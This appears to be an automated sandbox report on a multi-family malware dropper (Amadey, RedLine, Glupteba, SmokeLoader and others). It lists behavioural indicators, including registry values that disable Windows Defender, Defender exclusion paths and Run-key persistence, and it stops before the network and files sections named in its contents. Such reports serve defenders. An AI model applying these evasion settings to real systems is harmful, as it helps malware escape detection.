Malware Analysis Report

2025-01-23 11:28

Sample ID 231010-zt6j9sch55
Target f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008
SHA256 f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan lutyr magia
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008

Threat Level: Known bad

The file f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008 was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan lutyr magia

SectopRAT

SectopRAT payload

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine payload

Detects Healer an antivirus disabler dropper

Amadey

Glupteba

Windows security bypass

Modifies Windows Defender Real-time Protection settings

DcRat

Glupteba payload

Detected google phishing page

SmokeLoader

Healer

RedLine

Drops file in Drivers directory

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Checks computer location settings

Loads dropped DLL

Windows security modification

Reads user/profile data of web browsers

Executes dropped EXE

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of UnmapMainImage

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Enumerates system info in registry

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 21:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 21:01

Reported

2023-10-10 21:50

Platform

win7-20230831-en

Max time kernel

142s

Max time network

182s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A

Detected google phishing page

phishing google

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\6397.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\6397.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\6397.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\6397.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\6397.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\6397.exe | N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description | Indicator | Process | Target
File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\531F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5707.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\590B.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6126.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6397.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67BD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE8C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D928.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DE09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\jjfrwhh N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\531F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\531F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67BD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\6397.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\6397.exe | N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\531F.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe | N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2176 set thread context of 2596 | N/A | C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description | Indicator | Process | Target
File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
File created | C:\Windows\Logs\CBS\CbsPersist_20231010214932.cab | C:\Windows\system32\makecab.exe | N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (data value omitted) | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D00D2801-67B6-11EE-A42E-EEDB236BE57B} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A
